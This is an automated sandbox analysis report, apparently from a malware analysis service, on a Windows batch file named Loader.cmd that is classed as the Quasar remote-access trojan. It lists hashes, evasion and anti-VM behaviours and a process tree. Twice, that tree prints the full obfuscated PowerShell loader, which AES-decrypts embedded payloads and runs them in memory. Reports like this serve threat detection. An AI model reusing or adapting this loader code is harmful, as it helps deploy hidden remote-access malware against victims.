Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
-
submitted
05-01-2025 03:47
General
-
Target
Loader.cmd
-
Size
7.3MB
-
MD5
1bec1098946595a03fa067a3ef7ce292
-
SHA1
89cfb4a2f8800f1b944d906d959639907672317d
-
SHA256
a8f184a333fb89f41ddca323472463b4ee2cbed63d26d105823300148e2015cb
-
SHA512
dc7e73ed353d50b73a0eb6f1d955812a29fc5e05df300487d1eda49cc78e6748929a17cd59b58148f7e8696fd0fdfd21e8269af6788f1037bda6d8ddf30c6082
-
SSDEEP
49152:262lW3ZtqF71E0f+DP24xmB1F+RfHhZzvTUPbFJMg0FQ5/Ai4cr5YSW7iFsihJv1:k
Score
10/10
Malware Config
Extracted
Family
quasar
Attributes
-
encryption_key
6F38862AF940DB0B877E1A5C024641D617D7FAB6
-
reconnect_delay
3000
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar family
-
Quasar payload 1 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
-
Blocklisted process makes network request 14 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Deletes itself 1 IoCs
-
Executes dropped EXE 1 IoCs
-
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 22 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Windows directory 4 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 21 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 7 IoCs
-
Modifies data under HKEY_USERS 62 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{b2eef300-1bbb-4ab8-9e40-da5cd3f2d960}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{f4eddd3b-94fd-4ab3-8aeb-41a6c915f5e0}2⤵
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loader.cmd"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives3⤵
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"3⤵
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives3⤵
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"3⤵
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function orcC($VcbY){ Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire -Verbose '$SYoq=QX[QXSyQXsQXtQXeQXmQX.QXSeQXcQXuQXrQXiQXtyQX.CQXryQXptQXoQXgQXrQXapQXhQXyQX.QXAQXeQXsQX]:QX:QXCQXrQXeQXatQXeQX(QX);'.Replace('QX', ''); Invoke-Expression -WarningAction Inquire '$SYoq.SdMSdodSdeSd=Sd[SdSSdySdstSdeSdmSd.SdSSdecSdurSditSdy.SdCSdrSdySdptSdoSdgSdrSdaSdpSdhSdy.SdCSdiSdpSdhSderSdMSdoSddSdeSd]Sd:Sd:SdCSdBSdC;'.Replace('Sd', ''); Invoke-Expression -Verbose '$SYoq.BAPBAadBAdBAiBAnBAgBA=BA[SBAyBAsBAtBAeBAm.BASeBAcuBAriBAtBAyBA.BACrBAyBApBAtBAoBAgBArBAapBAhBAyBA.BAPBAadBAdBAiBAnBAgBAMBAoBAdBAeBA]BA:BA:BAPKBACBASBA7;'.Replace('BA', ''); Invoke-Expression -Verbose '$SYoq.ffKffeyff=ff[ffSffyffsffteffmff.ffCffoffnvfferfft]ff::ffFffrffoffmBffaffsffeff6ff4ffSfftrffiffnffg("ffsffM0ffmffsffDffDffIffoMffhff1ffSffmff09ffPMffedffmlffRff5ffsff8dffKffdffWffvffJff5ffQgffLff0ff/ffkffKTffMffcff=");'.Replace('ff', ''); Invoke-Expression -Verbose '$SYoq.gvIgvV=gv[gvSgvygvsgvtgvemgv.gvCgvogvngvvegvrtgv]:gv:FgvrgvogvmgvBagvsgvegv6gv4gvSgvtgvrigvngvggv("gvYgvqRgvzgvygvygvqgvRgv5VgvugvmgvBgv3gvO1gvovgvK9gvowgv=gv=gv");'.Replace('gv', ''); $HyBY=$SYoq.CreateDecryptor(); $fhiM=$HyBY.TransformFinalBlock($VcbY, 0, $VcbY.Length); $HyBY.Dispose(); $SYoq.Dispose(); $fhiM;}function tHVO($VcbY){ Invoke-Expression -WarningAction Inquire '$amXY=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm(,$VcbY);'.Replace('uL', ''); Invoke-Expression -Debug '$DOPc=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm;'.Replace('uL', ''); Invoke-Expression -InformationAction Ignore '$ZloT=yjNyjewyj-yjOyjbyjjyjeyjctyj yjSyjyyjsyjteyjm.yjIOyj.Cyjoyjmyjpyjreyjsyjsyjiyjoyjnyj.yjGZyjiyjpyjSyjtyjreyjayjm($amXY, yj[yjIOyj.yjCyjoyjmyjpyjreyjsyjsyjiyjoyjn.yjCoyjmpyjreyjsyjsyjiyjonyjMyjoyjdyjeyj]yj:yj:Dyjeyjcyjoyjmyjpryjeyjsyjs);'.Replace('yj', ''); $ZloT.CopyTo($DOPc); $ZloT.Dispose(); $amXY.Dispose(); $DOPc.Dispose(); $DOPc.ToArray();}function Kxmi($VcbY,$Hqen){ Invoke-Expression -Verbose -WarningAction Inquire -Debug '$fabe=DH[DHSyDHsDHtDHeDHmDH.DHReDHfDHlDHeDHcDHtiDHonDH.ADHssDHeDHmDHbDHlyDH]DH:DH:DHLDHoDHaDHd([byte[]]$VcbY);'.Replace('DH', ''); Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore -Debug '$gCDr=$fabe.lNElNntlNrlNylNPlNolNilNntlN;'.Replace('lN', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire '$gCDroQ.oQInoQvoQooQkoQeoQ(oQ$noQuoQloQloQ, $Hqen);'.Replace('oQ', '');}$iHJt = 'C:\Users\Admin\AppData\Local\Temp\Loader.cmd';$host.UI.RawUI.WindowTitle = $iHJt;$TXrr=[System.IO.File]::ReadAllText($iHJt).Split([Environment]::NewLine);foreach ($WQOD in $TXrr) { if ($WQOD.StartsWith('OEsNQ')) { $oQmN=$WQOD.Substring(5); break; }}$OMnU=[string[]]$oQmN.Split('\');Invoke-Expression -InformationAction Ignore -Debug -Verbose '$taV = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Verbose '$VJL = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Debug '$Qei = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Kxmi $taV $null;Kxmi $VJL $null;Kxmi $Qei (,[string[]] (''));3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Deletes itself
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5036 -s 24284⤵
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\Loader.cmd>C:\Windows\$rbx-onimai2\$rbx-CO2.bat4⤵
- Drops file in Windows directory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives5⤵
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"5⤵
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives5⤵
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"5⤵
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function orcC($VcbY){ Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire -Verbose '$SYoq=QX[QXSyQXsQXtQXeQXmQX.QXSeQXcQXuQXrQXiQXtyQX.CQXryQXptQXoQXgQXrQXapQXhQXyQX.QXAQXeQXsQX]:QX:QXCQXrQXeQXatQXeQX(QX);'.Replace('QX', ''); Invoke-Expression -WarningAction Inquire '$SYoq.SdMSdodSdeSd=Sd[SdSSdySdstSdeSdmSd.SdSSdecSdurSditSdy.SdCSdrSdySdptSdoSdgSdrSdaSdpSdhSdy.SdCSdiSdpSdhSderSdMSdoSddSdeSd]Sd:Sd:SdCSdBSdC;'.Replace('Sd', ''); Invoke-Expression -Verbose '$SYoq.BAPBAadBAdBAiBAnBAgBA=BA[SBAyBAsBAtBAeBAm.BASeBAcuBAriBAtBAyBA.BACrBAyBApBAtBAoBAgBArBAapBAhBAyBA.BAPBAadBAdBAiBAnBAgBAMBAoBAdBAeBA]BA:BA:BAPKBACBASBA7;'.Replace('BA', ''); Invoke-Expression -Verbose '$SYoq.ffKffeyff=ff[ffSffyffsffteffmff.ffCffoffnvfferfft]ff::ffFffrffoffmBffaffsffeff6ff4ffSfftrffiffnffg("ffsffM0ffmffsffDffDffIffoMffhff1ffSffmff09ffPMffedffmlffRff5ffsff8dffKffdffWffvffJff5ffQgffLff0ff/ffkffKTffMffcff=");'.Replace('ff', ''); Invoke-Expression -Verbose '$SYoq.gvIgvV=gv[gvSgvygvsgvtgvemgv.gvCgvogvngvvegvrtgv]:gv:FgvrgvogvmgvBagvsgvegv6gv4gvSgvtgvrigvngvggv("gvYgvqRgvzgvygvygvqgvRgv5VgvugvmgvBgv3gvO1gvovgvK9gvowgv=gv=gv");'.Replace('gv', ''); $HyBY=$SYoq.CreateDecryptor(); $fhiM=$HyBY.TransformFinalBlock($VcbY, 0, $VcbY.Length); $HyBY.Dispose(); $SYoq.Dispose(); $fhiM;}function tHVO($VcbY){ Invoke-Expression -WarningAction Inquire '$amXY=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm(,$VcbY);'.Replace('uL', ''); Invoke-Expression -Debug '$DOPc=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm;'.Replace('uL', ''); Invoke-Expression -InformationAction Ignore '$ZloT=yjNyjewyj-yjOyjbyjjyjeyjctyj yjSyjyyjsyjteyjm.yjIOyj.Cyjoyjmyjpyjreyjsyjsyjiyjoyjnyj.yjGZyjiyjpyjSyjtyjreyjayjm($amXY, yj[yjIOyj.yjCyjoyjmyjpyjreyjsyjsyjiyjoyjn.yjCoyjmpyjreyjsyjsyjiyjonyjMyjoyjdyjeyj]yj:yj:Dyjeyjcyjoyjmyjpryjeyjsyjs);'.Replace('yj', ''); $ZloT.CopyTo($DOPc); $ZloT.Dispose(); $amXY.Dispose(); $DOPc.Dispose(); $DOPc.ToArray();}function Kxmi($VcbY,$Hqen){ Invoke-Expression -Verbose -WarningAction Inquire -Debug '$fabe=DH[DHSyDHsDHtDHeDHmDH.DHReDHfDHlDHeDHcDHtiDHonDH.ADHssDHeDHmDHbDHlyDH]DH:DH:DHLDHoDHaDHd([byte[]]$VcbY);'.Replace('DH', ''); Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore -Debug '$gCDr=$fabe.lNElNntlNrlNylNPlNolNilNntlN;'.Replace('lN', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire '$gCDroQ.oQInoQvoQooQkoQeoQ(oQ$noQuoQloQloQ, $Hqen);'.Replace('oQ', '');}$iHJt = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $iHJt;$TXrr=[System.IO.File]::ReadAllText($iHJt).Split([Environment]::NewLine);foreach ($WQOD in $TXrr) { if ($WQOD.StartsWith('OEsNQ')) { $oQmN=$WQOD.Substring(5); break; }}$OMnU=[string[]]$oQmN.Split('\');Invoke-Expression -InformationAction Ignore -Debug -Verbose '$taV = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Verbose '$VJL = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Debug '$Qei = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Kxmi $taV $null;Kxmi $VJL $null;Kxmi $Qei (,[string[]] (''));5⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1652 -s 24406⤵
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1652 -s 24566⤵
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
-
-
-
-
-
-
C:\Windows\$nya-onimai2\oTnzMN.exe"C:\Windows\$nya-onimai2\oTnzMN.exe"2⤵
- Executes dropped EXE
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5992 -s 2443⤵
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 5036 -ip 50362⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 556 -p 1652 -ip 16522⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 492 -p 1652 -ip 16522⤵
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 612 -p 5992 -ip 59922⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
13KB
MD5977b70d2ef8a2d102266587685da7423
SHA1a5822247babb4acf3fe162afcb13c42abf70d8cc
SHA25650f2610bd7101ac3d08d24f76bedf84bd157a6db83beb38182861ce7fa24af2e
SHA512a8135fda52847726f54ce54679def889258f57fc48aae69ea23256d137ee732d09d91923ca15298dfac6476aadc755c9e9c27d3beac3ec3e10eba9fdb66be5e5
-
Filesize
13KB
MD5f8d0c8afb8068b6525cfc4c80ce2b9da
SHA1a1477becf41c9d3135713b6881a565597c3bea84
SHA2562ed9b723854b9fc65bfa6db9d08994aed33c41af5a9e9f9cced46a460f1167e4
SHA5129896f2b98e9d5987efd2980a0e805cc38de1267c547612fb9aa00909d22e0884ad5be368bfe95f867fe342b61d4491e69c87b43334d0a0f580505ec7c019395a
-
Filesize
13KB
MD57d042bc1a657c401a326f32e7e38ddb7
SHA13dd4eab16c415785d79801e2fdd74de8ba17ca0f
SHA2564ab3457cf6334431d35cdbf9a54dbac7d4557609c716a6dd07547f0881fc82f8
SHA51218386d538ade5aac10a8f522a493f4bc2bcb52ae00b3a0279af10073b1a491876a9c7796bac97a3d9b1a5564e8a803ef3ce9e6591fb1a1757880a15770c5fa6e
-
Filesize
34KB
MD5ba0d414603263f470daa03ecad602a60
SHA18de692cac7577e0b333fef5b96237be8bdd340b0
SHA256c6703a1319ed24156aa3dcb132db526d01b89bd16ce635d497855f79c6cd90c4
SHA5128637c17f6fe6249130a546e836fc1de510fbed9c03aa72ee6a416eeb4cd4e5010bc1020c6d9818d99b1edbd4751f225f448414c8bd44c048cc5793e19e457465
-
Filesize
35KB
MD5645e22ab9c87c6b7b66383a950131619
SHA1bcc02befe8b8142771346ca0531a69317ba03af6
SHA256d75a96908b6c4dacd2cd2dbfa59841a3060d1f1f4024db533ac97487e0435b73
SHA512f5dc4da1f2c125a03cee8af89b2f3d1e1078595f1efd4018d9c201db0064f82e54ce0abb685ca93bde3a48366135adab3a4aa2b2cf8119aee9d93a49cab20590
-
Filesize
35KB
MD5195f32e868bdab508c2d4ef597bd640d
SHA137a99b86131db04e44a157bd3ab84aa5df353141
SHA256be916f007a6e54b96a0aa9a94e188f4051741c4d50018e4620bfba7a5b8baccf
SHA512e6ec180ad5d981d5f6656abe42c53931e1a94b606ad3e17bf2b2edd66e7537dc710ed405bbc263ca0207910767b4caf1f0c6880545f522826a5b11fc4e2b6693
-
Filesize
3KB
MD517a17db79c19d4aa20da768f2f11e0f6
SHA178a73b83c002d4f3b51b69fc3cdf9cf0167fedc1
SHA256e9819d3ecd5796772aaeb07dc1c5da0563d3a1bf9422da03b0514b95ffad8289
SHA5127a450bd6e8767e16345db6745f162de8e948fb7b65dc5aa1b27e9c395f7657a5fc8a6becbe7e5d332c3c7480783474936e6d21f6421454d8fbe35f2f946043be
-
Filesize
62KB
MD5e566632d8956997225be604d026c9b39
SHA194a9aade75fffc63ed71404b630eca41d3ce130e
SHA256b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0
SHA512f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd
-
Filesize
1KB
MD538d82e4dea1c1bf49bf8ec02767bf6c5
SHA1d047341a619d44c61fe80a9591f87a3806699dee
SHA256d753c949c37d2cdb08f9639a37f79c34c5c65eaebe6691bcae1b02d5585b6ee1
SHA512e30c6cf10376b148552fdb69ad994a0369d6c121dc193b4e11dbd7f13004461fe7e292aa4eb1edd0325a8dd52c86f159bb0835e9331ecc0cd050c83935a4a2a7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
36KB
MD5b943a57bdf1bbd9c33ab0d33ff885983
SHA11cee65eea1ab27eae9108c081e18a50678bd5cdc
SHA256878df6f755578e2e79d0e6fd350f5b4430e0e42bb4bc8757afb97999bc405ba4
SHA512cb7253de88bd351f8bcb5dc0b5760d3d2875d39f601396a4250e06ead9e7edeffcd94fa23f392833f450c983a246952f2bad3a40f84aff2adc0f7d0eb408d03c
-
Filesize
7.3MB
MD51bec1098946595a03fa067a3ef7ce292
SHA189cfb4a2f8800f1b944d906d959639907672317d
SHA256a8f184a333fb89f41ddca323472463b4ee2cbed63d26d105823300148e2015cb
SHA512dc7e73ed353d50b73a0eb6f1d955812a29fc5e05df300487d1eda49cc78e6748929a17cd59b58148f7e8696fd0fdfd21e8269af6788f1037bda6d8ddf30c6082
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
